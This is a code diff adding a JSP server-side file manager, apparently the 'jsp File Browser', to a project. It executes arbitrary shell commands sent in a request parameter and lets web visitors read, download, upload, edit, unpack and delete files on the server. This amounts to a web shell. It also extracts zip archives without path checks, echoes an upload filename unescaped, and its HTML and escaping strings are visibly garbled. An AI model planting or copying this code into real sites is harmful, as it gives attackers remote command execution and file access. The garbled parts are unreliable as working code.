+			File f = (File) v.get(i);
+			if (f.isDirectory()) {
+				File[] fs = f.listFiles();
+				for (int n = 0; n < fs.length; n++)
+					v.add(fs[n]);
+				if (!inclDirs) {
+					v.remove(i);
+					i--;
+				}
+			}
+		}
+		return v;
+	}
+
+	/**
+	 * Method to build an absolute path
+	 * @param dir the root dir
+	 * @param name the name of the new directory
+	 * @return if name is an absolute directory, returns name, else returns dir+name
+	 */
+	static String getDir(String dir, String name) {
+		if (!dir.endsWith(File.separator)) dir = dir + File.separator;
+		File mv = new File(name);
+		String new_dir = null;
+		if (!mv.isAbsolute()) {
+			new_dir = dir + name;
+		}
+		else new_dir = name;
+		return new_dir;
+	}
+
+	/**
+	 * This Method converts a byte size in a kbytes or Mbytes size, depending on the size
+	 *     @param size The size in bytes
+	 *     @return String with size and unit
+	 */
+	static String convertFileSize(long size) {
+		int divisor = 1;
+		String unit = "bytes";
+		if (size >= 1024 * 1024) {
+			divisor = 1024 * 1024;
+			unit = "MB";
+		}
+		else if (size >= 1024) {
+			divisor = 1024;
+			unit = "KB";
+		}
+		if (divisor == 1) return size / divisor + " " + unit;
+		String aftercomma = "" + 100 * (size % divisor) / divisor;
+		if (aftercomma.length() == 1) aftercomma = "0" + aftercomma;
+		return size / divisor + "." + aftercomma + " " + unit;
+	}
+
+	/**
+	 * Copies all data from in to out
+	 * 	@param in the input stream
+	 *	@param out the output stream
+	 *	@param buffer copy buffer
+	 */
+	static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException {
+		copyStreamsWithoutClose(in, out, buffer);
+		in.close();
+		out.close();
+	}
+
+	/**
+	 * Copies all data from in to out
+	 * 	@param in the input stream
+	 *	@param out the output stream
+	 *	@param buffer copy buffer
+	 */
+	static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer)
+			throws IOException {
+		int b;
+		while ((b = in.read(buffer)) != -1)
+			out.write(buffer, 0, b);
+	}
+
+	/**
+	 * Returns the Mime Type of the file, depending on the extension of the filename
+	 */
+	static String getMimeType(String fName) {
+		fName = fName.toLowerCase();
+		if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg";
+		else if (fName.endsWith(".gif")) return "image/gif";
+		else if (fName.endsWith(".pdf")) return "application/pdf";
+		else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html";
+		else if (fName.endsWith(".avi")) return "video/x-msvideo";
+		else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime";
+		else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg";
+		else if (fName.endsWith(".zip")) return "application/zip";
+		else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff";
+		else if (fName.endsWith(".rtf")) return "application/rtf";
+		else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi";
+		else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv")
+				|| fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt")
+				|| fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel";
+		else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword";
+		else if (fName.endsWith(".png")) return "image/png";
+		else if (fName.endsWith(".xml")) return "text/xml";
+		else if (fName.endsWith(".svg")) return "image/svg+xml";
+		else if (fName.endsWith(".mp3")) return "audio/mp3";
+		else if (fName.endsWith(".ogg")) return "audio/ogg";
+		else return "text/plain";
+	}
+
+	/**
+	 * Converts some important chars (int) to the corresponding html string
+	 */
+	static String conv2Html(int i) {
+		if (i == '&') return "&";
+		else if (i == '<') return "<";
+		else if (i == '>') return ">";
+		else if (i == '"') return """;
+		else return "" + (char) i;
+	}
+
+	/**
+	 * Converts a normal string to a html conform string
+	 */
+	static String conv2Html(String st) {
+		StringBuffer buf = new StringBuffer();
+		for (int i = 0; i < st.length(); i++) {
+			buf.append(conv2Html(st.charAt(i)));
+		}
+		return buf.toString();
+	}
+
+	/**
+	 * Starts a native process on the server
+	 * 	@param command the command to start the process
+	 *	@param dir the dir in which the process starts
+	 */
+	static String startProcess(String command, String dir) throws IOException {
+		StringBuffer ret = new StringBuffer();
+		String[] comm = new String[3];
+		comm[0] = COMMAND_INTERPRETER[0];
+		comm[1] = COMMAND_INTERPRETER[1];
+		comm[2] = command;
+		long start = System.currentTimeMillis();
+		try {
+			//Start process
+			Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));
+			//Get input and error streams
+			BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream());
+			BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream());
+			boolean end = false;
+			while (!end) {
+				int c = 0;
+				while ((ls_err.available() > 0) && (++c <= 1000)) {
+					ret.append(conv2Html(ls_err.read()));
+				}
+				c = 0;
+				while ((ls_in.available() > 0) && (++c <= 1000)) {
+					ret.append(conv2Html(ls_in.read()));
+				}
+				try {
+					ls_proc.exitValue();
+					//if the process has not finished, an exception is thrown
+					//else
+					while (ls_err.available() > 0)
+						ret.append(conv2Html(ls_err.read()));
+					while (ls_in.available() > 0)
+						ret.append(conv2Html(ls_in.read()));
+					end = true;
+				}
+				catch (IllegalThreadStateException ex) {
+					//Process is running
+				}
+				//The process is not allowed to run longer than given time.
+				if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) {
+					ls_proc.destroy();
+					end = true;
+					ret.append("!!!! Process has timed out, destroyed !!!!!");
+				}
+				try {
+					Thread.sleep(50);
+				}
+				catch (InterruptedException ie) {}
+			}
+		}
+		catch (IOException e) {
+			ret.append("Error: " + e);
+		}
+		return ret.toString();
+	}
+
+	/**
+	 * Converts a dir string to a linked dir string
+	 * 	@param dir the directory string (e.g. /usr/local/httpd)
+	 *	@param browserLink web-path to Browser.jsp
+	 */
+	static String dir2linkdir(String dir, String browserLink, int sortMode) {
+		File f = new File(dir);
+		StringBuffer buf = new StringBuffer();
+		while (f.getParentFile() != null) {
+			if (f.canRead()) {
+				String encPath = URLEncoder.encode(f.getAbsolutePath());
+				buf.insert(0, "" + conv2Html(f.getName()) + File.separator + "");
+			}
+			else buf.insert(0, conv2Html(f.getName()) + File.separator);
+			f = f.getParentFile();
+		}
+		if (f.canRead()) {
+			String encPath = URLEncoder.encode(f.getAbsolutePath());
+			buf.insert(0, "" + conv2Html(f.getAbsolutePath()) + "");
+		}
+		else buf.insert(0, f.getAbsolutePath());
+		return buf.toString();
+	}
+
+	/**
+	 *	Returns true if the given filename tends towards a packed file
+	 */
+	static boolean isPacked(String name, boolean gz) {
+		return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar")
+				|| (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase()
+				.endsWith(".war"));
+	}
+
+	/**
+	 *	If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not
+	 */
+	static boolean isAllowed(File path) throws IOException{
+		if (RESTRICT_BROWSING) {
+            StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";");
+            while (stk.hasMoreTokens()){
+			    if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken()))
+                    return RESTRICT_WHITELIST;
+            }
+            return !RESTRICT_WHITELIST;
+		}
+		else return true;
+	}
+
+	//---------------------------------------------------------------------------------------------------------------
+
+	%>
+<%
+		//Get the current browsing directory
+		request.setAttribute("dir", request.getParameter("dir"));
+		// The browser_name variable is used to keep track of the URI
+		// of the jsp file itself.  It is used in all link-backs.
+		final String browser_name = request.getRequestURI();
+		final String FOL_IMG = "";
+		boolean nohtml = false;
+		boolean dir_view = true;
+		// View file
+		if (request.getParameter("file") != null) {
+            File f = new File(request.getParameter("file"));
+            if (!isAllowed(f)) {
+                request.setAttribute("dir", f.getParent());
+                request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath());
+            }
+            else if (f.exists() && f.canRead()) {
+                if (isPacked(f.getName(), false)) {
+                    //If zipFile, do nothing here
+                }
+                else{
+                    String mimeType = getMimeType(f.getName());
+                    response.setContentType(mimeType);
+                    if (mimeType.equals("text/plain")) response.setHeader(
+                            "Content-Disposition", "inline;filename=\"temp.txt\"");
+                    else response.setHeader("Content-Disposition", "inline;filename=\""
+                            + f.getName() + "\"");
+                    BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
+                    byte buffer[] = new byte[8 * 1024];
+                    out.clearBuffer();
+                    OutputStream out_s = new Writer2Stream(out);
+                    copyStreamsWithoutClose(fileInput, out_s, buffer);
+                    fileInput.close();
+                    out_s.flush();
+                    nohtml = true;
+                    dir_view = false;
+                }
+            }
+            else {
+                request.setAttribute("dir", f.getParent());
+                request.setAttribute("error", "File " + f.getAbsolutePath()
+                        + " does not exist or is not readable on the server");
+            }
+		}
+		// Download selected files as zip file
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(SAVE_AS_ZIP))) {
+			Vector v = expandFileList(request.getParameterValues("selfile"), false);
+			//Check if all files in vector are allowed
+			String notAllowedFile = null;
+			for (int i = 0;i < v.size(); i++){
+				File f = (File) v.get(i);
+				if (!isAllowed(f)){
+					notAllowedFile = f.getAbsolutePath();
+					break;
+				}
+			}
+			if (notAllowedFile != null){
+				request.setAttribute("error", "You are not allowed to access " + notAllowedFile);
+			}
+			else if (v.size() == 0) {
+				request.setAttribute("error", "No files selected");
+			}
+			else {
+				File dir_file = new File("" + request.getAttribute("dir"));
+				int dir_l = dir_file.getAbsolutePath().length();
+				response.setContentType("application/zip");
+				response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\"");
+				out.clearBuffer();
+				ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out));
+				zipout.setComment("Created by jsp File Browser v. " + VERSION_NR);
+				zipout.setLevel(COMPRESSION_LEVEL);
+				for (int i = 0; i < v.size(); i++) {
+					File f = (File) v.get(i);
+					if (f.canRead()) {
+						zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1)));
+						BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f));
+						byte buffer[] = new byte[0xffff];
+						copyStreamsWithoutClose(fr, zipout, buffer);
+						/*					int b;
+						 while ((b=fr.read())!=-1) zipout.write(b);*/
+						fr.close();
+						zipout.closeEntry();
+					}
+				}
+				zipout.finish();
+				out.flush();
+				nohtml = true;
+				dir_view = false;
+			}
+		}
+		// Download file
+		else if (request.getParameter("downfile") != null) {
+			String filePath = request.getParameter("downfile");
+			File f = new File(filePath);
+			if (!isAllowed(f)){
+				request.setAttribute("dir", f.getParent());
+				request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile());
+			}
+			else if (f.exists() && f.canRead()) {
+				response.setContentType("application/octet-stream");
+				response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName()
+						+ "\"");
+				response.setContentLength((int) f.length());
+				BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
+				byte buffer[] = new byte[8 * 1024];
+				out.clearBuffer();
+				OutputStream out_s = new Writer2Stream(out);
+				copyStreamsWithoutClose(fileInput, out_s, buffer);
+				fileInput.close();
+				out_s.flush();
+				nohtml = true;
+				dir_view = false;
+			}
+			else {
+				request.setAttribute("dir", f.getParent());
+				request.setAttribute("error", "File " + f.getAbsolutePath()
+						+ " does not exist or is not readable on the server");
+			}
+		}
+		if (nohtml) return;
+		//else
+			// If no parameter is submitted, it will take the path from jsp file browser
+			if (request.getAttribute("dir") == null) {
+				String path = null;
+				if (application.getRealPath(request.getRequestURI()) != null) path = new File(
+						application.getRealPath(request.getRequestURI())).getParent();
+
+				if (path == null) { // handle the case where we are not in a directory (ex: war file)
+					path = new File(".").getAbsolutePath();
+				}
+				//Check path
+                if (!isAllowed(new File(path))){
+                    if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH;
+                    else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";"));
+                }
+				request.setAttribute("dir", path);
+			}%>
+
+
+
+
+
+
+
+<%
+			//If a cssfile exists, it will take it
+			String cssPath = null;
+			if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File(
+					application.getRealPath(request.getRequestURI())).getParent()
+					+ File.separator + CSS_NAME;
+			if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString();
+			if (new File(cssPath).exists()) {
+%>
+
+      <%}
+			else if (request.getParameter("uplMonitor") == null) {%>
+	
+	<%}
+		
+        //Check path
+        if (!isAllowed(new File((String)request.getAttribute("dir")))){
+            request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir"));
+        }
+		//Upload monitor
+		else if (request.getParameter("uplMonitor") != null) {%>
+	<%
+			String fname = request.getParameter("uplMonitor");
+			//First opening
+			boolean first = false;
+			if (request.getParameter("first") != null) first = true;
+			UplInfo info = new UplInfo();
+			if (!first) {
+				info = UploadMonitor.getInfo(fname);
+				if (info == null) {
+					//Windows
+					int posi = fname.lastIndexOf("\\");
+					if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1));
+				}
+				if (info == null) {
+					//Unix
+					int posi = fname.lastIndexOf("/");
+					if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1));
+				}
+			}
+			dir_view = false;
+			request.setAttribute("dir", null);
+			if (info.aborted) {
+				UploadMonitor.remove(fname);
+				%>
+
+
+Upload of <%=fname%>

    
+Upload aborted.
+<%
+			}
+			else if (info.totalSize != info.currSize || info.currSize == 0) {
+				%>
+
+
+
+Upload of <%=fname%>

    
+
    
+
+
+
    
+<%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%>
+(<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).
    
+Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%>
+
+<%
+			}
+			else {
+				UploadMonitor.remove(fname);
+				%>
+
+
+Upload of <%=fname%>

    
+Upload finished.
+
+<%
+			}
+		}
+		//Comandwindow
+		else if (request.getParameter("command") != null) {
+            if (!NATIVE_COMMANDS){
+                request.setAttribute("error", "Execution of native commands is not allowed!");
+            }
+			else if (!"Cancel".equalsIgnoreCase(request.getParameter("Submit"))) {
+%>
+Launch commands in <%=request.getAttribute("dir")%>
+
+
+<%
+				out.println("
    \n"
+						+ "
+	">
+	
    
+	
+	
+	
+	
    
+	
+	
    
+	">
+	
    
+	
    
+
+
+<%
+				dir_view = false;
+				request.setAttribute("dir", null);
+			}
+		}
+
+		//Click on a filename, special viewer (zip+jar file)
+		else if (request.getParameter("file") != null) {
+			File f = new File(request.getParameter("file"));
+            if (!isAllowed(f)){
+                request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
+            }
+			else if (isPacked(f.getName(), false)) {
+				//ZipFile
+				try {
+					ZipFile zf = new ZipFile(f);
+					Enumeration entries = zf.entries();
+%>
+<%= f.getAbsolutePath()%>
+
+
+	
    Content of <%=conv2Html(f.getName())%>

    
+	
+	
+<%
+					long size = 0;
+					int fileCount = 0;
+					while (entries.hasMoreElements()) {
+						ZipEntry entry = (ZipEntry) entries.nextElement();
+						if (!entry.isDirectory()) {
+							fileCount++;
+							size += entry.getSize();
+							long ratio = 0;
+							if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100)
+									/ entry.getSize();
+							out.println("");
+
+						}
+					}
+					zf.close();
+					//No directory view
+					dir_view = false;
+					request.setAttribute("dir", null);
+%>
+	
    NameUncompressed sizeCompressed sizeCompr. ratioDate
    " + conv2Html(entry.getName())
+									+ "" + convertFileSize(entry.getSize()) + ""
+									+ convertFileSize(entry.getCompressedSize()) + ""
+									+ ratio + "%" + ""
+									+ dateFormat.format(new Date(entry.getTime())) + "
    
+	
    
+	<%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>%
+	
    
+
+<%
+				}
+				catch (ZipException ex) {
+					request.setAttribute("error", "Cannot read " + f.getName()
+							+ ", no valid zip file");
+				}
+				catch (IOException ex) {
+					request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: "
+							+ ex);
+				}
+			}
+		}
+		// Upload
+		else if ((request.getContentType() != null)
+				&& (request.getContentType().toLowerCase().startsWith("multipart"))) {
+			response.setContentType("text/html");
+			HttpMultiPartParser parser = new HttpMultiPartParser();
+			boolean error = false;
+			try {
+				int bstart = request.getContentType().lastIndexOf("oundary=");
+				String bound = request.getContentType().substring(bstart + 8);
+				int clength = request.getContentLength();
+				Hashtable ht = parser
+						.processData(request.getInputStream(), bound, tempdir, clength);
+                if (!isAllowed(new File((String)ht.get("dir")))){
+                    request.setAttribute("error", "You are not allowed to access " + ht.get("dir"));
+                    error = true;
+                }
+				else if (ht.get("myFile") != null) {
+					FileInfo fi = (FileInfo) ht.get("myFile");
+					File f = fi.file;
+					UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
+					if (info != null && info.aborted) {
+						f.delete();
+						request.setAttribute("error", "Upload aborted");
+					}
+					else {
+						// Move file from temp to the right dir
+						String path = (String) ht.get("dir");
+						if (!path.endsWith(File.separator)) path = path + File.separator;
+						if (!f.renameTo(new File(path + f.getName()))) {
+							request.setAttribute("error", "Cannot upload file.");
+							error = true;
+							f.delete();
+						}
+					}
+				}
+				else {
+					request.setAttribute("error", "No file selected for upload");
+					error = true;
+				}
+				request.setAttribute("dir", (String) ht.get("dir"));
+			}
+			catch (Exception e) {
+				request.setAttribute("error", "Error " + e + ". Upload aborted");
+				error = true;
+			}
+			if (!error) request.setAttribute("message", "File upload correctly finished.");
+		}
+		// The form to edit a text file
+		else if (request.getParameter("editfile") != null) {
+			File ef = new File(request.getParameter("editfile"));
+            if (!isAllowed(ef)){
+                request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath());
+            }
+            else{
+%>
+Edit <%=conv2Html(request.getParameter("editfile"))%>
+
+
+<%
+                BufferedReader reader = new BufferedReader(new FileReader(ef));
+                String disable = "";
+                if (!ef.canWrite()) disable = " readonly";
+                out.println("
    \n"
+                        + "
+	">
+	
    
+	
+		
+		
+		
+		
+		
+		
+	
    >Ms-Dos/Windows>UnixWrite backup
    
+		">
+		
    
+	
    
+
+
+<%
+            }
+		}
+		// Save or cancel the edited file
+		else if (request.getParameter("nfile") != null) {
+			File f = new File(request.getParameter("nfile"));
+			File new_f = new File(getDir(f.getParent(), request.getParameter("new_name")));
+            if (!isAllowed(new_f)){
+                request.setAttribute("error", "You are not allowed to access " + new_f.getAbsolutePath());
+            }
+			else if (request.getParameter("Submit").equals("Save")) {
+				if (new_f.exists() && new_f.canWrite() && request.getParameter("Backup") != null) {
+					File bak = new File(new_f.getAbsolutePath() + ".bak");
+					bak.delete();
+					new_f.renameTo(bak);
+				}
+				if (new_f.exists() && !new_f.canWrite()) request.setAttribute("error",
+						"Cannot write to " + new_f.getName() + ", file is write protected.");
+				else {
+					BufferedWriter outs = new BufferedWriter(new FileWriter(new_f));
+					StringReader text = new StringReader(request.getParameter("text"));
+					int i;
+					boolean cr = false;
+					String lineend = "\n";
+					if (request.getParameter("lineformat").equals("dos")) lineend = "\r\n";
+					while ((i = text.read()) >= 0) {
+						if (i == '\r') cr = true;
+						else if (i == '\n') {
+							outs.write(lineend);
+							cr = false;
+						}
+						else if (cr) {
+							outs.write(lineend);
+							cr = false;
+						}
+						else {
+							outs.write(i);
+							cr = false;
+						}
+					}
+					outs.flush();
+					outs.close();
+				}
+			}
+			request.setAttribute("dir", f.getParent());
+		}
+		//Unpack file to the current directory without overwriting
+		else if (request.getParameter("unpackfile") != null) {
+			File f = new File(request.getParameter("unpackfile"));
+			String root = f.getParent();
+			request.setAttribute("dir", root);
+            if (!isAllowed(new File(root))){
+                request.setAttribute("error", "You are not allowed to access " + root);
+            }
+			//Check if file exists
+			else if (!f.exists()) {
+				request.setAttribute("error", "Cannot unpack " + f.getName()
+						+ ", file does not exist");
+			}
+			//Check if directory is readonly
+			else if (!f.getParentFile().canWrite()) {
+				request.setAttribute("error", "Cannot unpack " + f.getName()
+						+ ", directory is write protected.");
+			}
+			//GZip
+			else if (f.getName().toLowerCase().endsWith(".gz")) {
+				//New name is old Name without .gz
+				String newName = f.getAbsolutePath().substring(0, f.getAbsolutePath().length() - 3);
+				try {
+					byte buffer[] = new byte[0xffff];
+					copyStreams(new GZIPInputStream(new FileInputStream(f)), new FileOutputStream(
+							newName), buffer);
+				}
+				catch (IOException ex) {
+					request.setAttribute("error", "Unpacking of " + f.getName()
+							+ " aborted. Error: " + ex);
+				}
+			}
+			//Else try Zip
+			else {
+				try {
+					ZipFile zf = new ZipFile(f);
+					Enumeration entries = zf.entries();
+					//First check whether a file already exist
+					boolean error = false;
+					while (entries.hasMoreElements()) {
+						ZipEntry entry = (ZipEntry) entries.nextElement();
+						if (!entry.isDirectory()
+								&& new File(root + File.separator + entry.getName()).exists()) {
+							request.setAttribute("error", "Cannot unpack " + f.getName()
+									+ ", File " + entry.getName() + " already exists.");
+							error = true;
+							break;
+						}
+					}
+					if (!error) {
+						//Unpack File
+						entries = zf.entries();
+						byte buffer[] = new byte[0xffff];
+						while (entries.hasMoreElements()) {
+							ZipEntry entry = (ZipEntry) entries.nextElement();
+							File n = new File(root + File.separator + entry.getName());
+							if (entry.isDirectory()) n.mkdirs();
+							else {
+								n.getParentFile().mkdirs();
+								n.createNewFile();
+								copyStreams(zf.getInputStream(entry), new FileOutputStream(n),
+										buffer);
+							}
+						}
+						zf.close();
+						request.setAttribute("message", "Unpack of " + f.getName()
+								+ " was successful.");
+					}
+				}
+				catch (ZipException ex) {
+					request.setAttribute("error", "Cannot unpack " + f.getName()
+							+ ", no valid zip file");
+				}
+				catch (IOException ex) {
+					request.setAttribute("error", "Unpacking of " + f.getName()
+							+ " aborted. Error: " + ex);
+				}
+			}
+		}
+		// Delete Files
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(DELETE_FILES))) {
+			Vector v = expandFileList(request.getParameterValues("selfile"), true);
+			boolean error = false;
+			//delete backwards
+			for (int i = v.size() - 1; i >= 0; i--) {
+				File f = (File) v.get(i);
+                if (!isAllowed(f)){
+                    request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
+                    error = true;
+                    break;
+                }
+				if (!f.canWrite() || !f.delete()) {
+					request.setAttribute("error", "Cannot delete " + f.getAbsolutePath()
+							+ ". Deletion aborted");
+					error = true;
+					break;
+				}
+			}
+			if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files deleted");
+			else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File deleted");
+			else if (!error) request.setAttribute("error", "No files selected");
+		}
+		// Create Directory
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(CREATE_DIR))) {
+			String dir = "" + request.getAttribute("dir");
+			String dir_name = request.getParameter("cr_dir");
+			String new_dir = getDir(dir, dir_name);
+            if (!isAllowed(new File(new_dir))){
+                request.setAttribute("error", "You are not allowed to access " + new_dir);
+            }
+			else if (new File(new_dir).mkdirs()) {
+				request.setAttribute("message", "Directory created");
+			}
+			else request.setAttribute("error", "Creation of directory " + new_dir + " failed");
+		}
+		// Create a new empty file
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(CREATE_FILE))) {
+			String dir = "" + request.getAttribute("dir");
+			String file_name = request.getParameter("cr_dir");
+			String new_file = getDir(dir, file_name);
+            if (!isAllowed(new File(new_file))){
+                request.setAttribute("error", "You are not allowed to access " + new_file);
+            }
+			// Test, if file_name is empty
+			else if (!"".equals(file_name.trim()) && !file_name.endsWith(File.separator)) {
+				if (new File(new_file).createNewFile()) request.setAttribute("message",
+						"File created");
+				else request.setAttribute("error", "Creation of file " + new_file + " failed");
+			}
+			else request.setAttribute("error", "Error: " + file_name + " is not a valid filename");
+		}
+		// Rename a file
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(RENAME_FILE))) {
+			Vector v = expandFileList(request.getParameterValues("selfile"), true);
+			String dir = "" + request.getAttribute("dir");
+			String new_file_name = request.getParameter("cr_dir");
+			String new_file = getDir(dir, new_file_name);
+            if (!isAllowed(new File(new_file))){
+                request.setAttribute("error", "You are not allowed to access " + new_file);
+            }
+			// The error conditions:
+			// 1) Zero Files selected
+			else if (v.size() <= 0) request.setAttribute("error",
+					"Select exactly one file or folder. Rename failed");
+			// 2a) Multiple files selected and the first isn't a dir
+			//     Here we assume that expandFileList builds v from top-bottom, starting with the dirs
+			else if ((v.size() > 1) && !(((File) v.get(0)).isDirectory())) request.setAttribute(
+					"error", "Select exactly one file or folder. Rename failed");
+			// 2b) If there are multiple files from the same directory, rename fails
+			else if ((v.size() > 1) && ((File) v.get(0)).isDirectory()
+					&& !(((File) v.get(0)).getPath().equals(((File) v.get(1)).getParent()))) {
+				request.setAttribute("error", "Select exactly one file or folder. Rename failed");
+			}
+			else {
+				File f = (File) v.get(0);
+                if (!isAllowed(f)){
+                    request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
+                }
+				// Test, if file_name is empty
+				else if ((new_file.trim() != "") && !new_file.endsWith(File.separator)) {
+					if (!f.canWrite() || !f.renameTo(new File(new_file.trim()))) {
+						request.setAttribute("error", "Creation of file " + new_file + " failed");
+					}
+					else request.setAttribute("message", "Renamed file "
+							+ ((File) v.get(0)).getName() + " to " + new_file);
+				}
+				else request.setAttribute("error", "Error: \"" + new_file_name
+						+ "\" is not a valid filename");
+			}
+		}
+		// Move selected file(s)
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(MOVE_FILES))) {
+			Vector v = expandFileList(request.getParameterValues("selfile"), true);
+			String dir = "" + request.getAttribute("dir");
+			String dir_name = request.getParameter("cr_dir");
+			String new_dir = getDir(dir, dir_name);
+            if (!isAllowed(new File(new_dir))){
+                request.setAttribute("error", "You are not allowed to access " + new_dir);
+            }
+            else{
+    			boolean error = false;
+                // This ensures that new_dir is a directory
+                if (!new_dir.endsWith(File.separator)) new_dir += File.separator;
+                for (int i = v.size() - 1; i >= 0; i--) {
+                    File f = (File) v.get(i);
+                    if (!isAllowed(f)){
+                        request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
+                        error = true;
+                        break;
+                    }
+                    else if (!f.canWrite() || !f.renameTo(new File(new_dir
+                            + f.getAbsolutePath().substring(dir.length())))) {
+                        request.setAttribute("error", "Cannot move " + f.getAbsolutePath()
+                                + ". Move aborted");
+                        error = true;
+                        break;
+                    }
+                }
+                if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files moved");
+                else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File moved");
+                else if (!error) request.setAttribute("error", "No files selected");
+            }
+		}
+		// Copy Files
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(COPY_FILES))) {
+			Vector v = expandFileList(request.getParameterValues("selfile"), true);
+			String dir = (String) request.getAttribute("dir");
+			if (!dir.endsWith(File.separator)) dir += File.separator;
+			String dir_name = request.getParameter("cr_dir");
+			String new_dir = getDir(dir, dir_name);
+            if (!isAllowed(new File(new_dir))){
+                request.setAttribute("error", "You are not allowed to access " + new_dir);
+            }
+            else{
+    			boolean error = false;
+                if (!new_dir.endsWith(File.separator)) new_dir += File.separator;
+                try {
+                    byte buffer[] = new byte[0xffff];
+                    for (int i = 0; i < v.size(); i++) {
+                        File f_old = (File) v.get(i);
+                        File f_new = new File(new_dir + f_old.getAbsolutePath().substring(dir.length()));
+                        if (!isAllowed(f_old)|| !isAllowed(f_new)){
+                            request.setAttribute("error", "You are not allowed to access " + f_new.getAbsolutePath());
+                            error = true;
+                        }
+                        else if (f_old.isDirectory()) f_new.mkdirs();
+                        // Overwriting is forbidden
+                        else if (!f_new.exists()) {
+                            copyStreams(new FileInputStream(f_old), new FileOutputStream(f_new), buffer);
+                        }
+                        else {
+                            // File exists
+                            request.setAttribute("error", "Cannot copy " + f_old.getAbsolutePath()
+                                    + ", file already exists. Copying aborted");
+                            error = true;
+                            break;
+                        }
+                    }
+                }
+                catch (IOException e) {
+                    request.setAttribute("error", "Error " + e + ". Copying aborted");
+                    error = true;
+                }
+                if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files copied");
+                else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File copied");
+                else if (!error) request.setAttribute("error", "No files selected");
+            }
+		}
+		// Directory viewer
+		if (dir_view && request.getAttribute("dir") != null) {
+			File f = new File("" + request.getAttribute("dir"));
+			//Check, whether the dir exists
+			if (!f.exists() || !isAllowed(f)) {
+				if (!f.exists()){
+                    request.setAttribute("error", "Directory " + f.getAbsolutePath() + " does not exist.");
+                }
+                else{
+                    request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
+                }
+				//if attribute olddir exists, it will change to olddir
+				if (request.getAttribute("olddir") != null && isAllowed(new File((String) request.getAttribute("olddir")))) {
+					f = new File("" + request.getAttribute("olddir"));
+				}
+				//try to go to the parent dir
+				else {
+					if (f.getParent() != null && isAllowed(f)) f = new File(f.getParent());
+				}
+				//If this dir also do also not exist, go back to browser.jsp root path
+				if (!f.exists()) {
+					String path = null;
+					if (application.getRealPath(request.getRequestURI()) != null) path = new File(
+							application.getRealPath(request.getRequestURI())).getParent();
+
+					if (path == null) // handle the case were we are not in a directory (ex: war file)
+					path = new File(".").getAbsolutePath();
+					f = new File(path);
+				}
+				if (isAllowed(f)) request.setAttribute("dir", f.getAbsolutePath());
+                else request.setAttribute("dir", null);
+			}
+%>
+
+<%=request.getAttribute("dir")%>
+
+
+<%
+			//Output message
+			if (request.getAttribute("message") != null) {
+				out.println("
    ");
+				out.println(request.getAttribute("message"));
+				out.println("
    ");
+			}
+			//Output error
+			if (request.getAttribute("error") != null) {
+				out.println("
    ");
+				out.println(request.getAttribute("error"));
